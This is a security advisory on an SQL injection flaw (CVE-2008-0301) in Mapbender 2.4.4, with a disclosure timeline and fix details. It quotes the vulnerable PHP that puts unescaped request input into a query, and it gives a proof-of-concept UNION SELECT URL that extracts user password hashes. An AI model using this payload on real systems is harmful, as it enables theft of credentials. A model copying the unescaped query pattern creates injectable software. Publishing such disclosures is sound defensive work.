|
|
|
|
| |
Credit:
The information has been provided by RedTeam Pentesting GmbH.
The original article can be found at: http://www.redteam-pentesting.de/advisories/rt-sa-2008-002.php
|
| |
Vulnerable Systems:
* Mapbender version 2.4.4
Immune Systems:
* Mapbender version 2.4.5 rc1
These vulnerabilities can be exploited regardless of PHP magic quotes. For demonstration purposes, the injection into the "gaz" variable of the file http/php/mod_gazetteer_edit.php is shown.
The two relevant lines are:
$sql = "SELECT * FROM gazetteer WHERE gazetteer_id = ".$_REQUEST["gaz"];
$res = db_query($sql);
The user input $_REQUEST["gaz"] goes unfiltered, unquoted and unescaped into an SQL statement. As no prepared statements are used here, an attacker can execute arbitrary SQL commands.
There is no need to use quotes in the SQL statement for an attacker, so PHP magic quotes do not help.
Proof of Concept:
The following request retrieves the first username and password hash from the Mapbender database.
http://www.example.com/php/mod_gazetteer_edit.php?gaz= 1 LIMIT 0 UNION
(SELECT char(65), char(65), char(65), char(65), char(65), char(65),
mb_user_name, char(65), mb_user_password, char(65) from mb_user
LIMIT 0,1)
Fix:
The vulnerability is fixed in release 2.4.5 rc1.
Security Risk:
As an attacker is able to e.g. get the password hashes of the administrators and other users, the risk is estimated as high.
CVE Information:
CVE-2008-0301
Disclosure Timeline:
2007-12-14 Problem identified during a penetration test
2008-01-09 Customer approves contacting of Mapbender developers
2008-01-17 CVE number assigned
2008-03-10 Vendor releases fixed version
2008-03-11 Advisory released
|
|
|
|
|
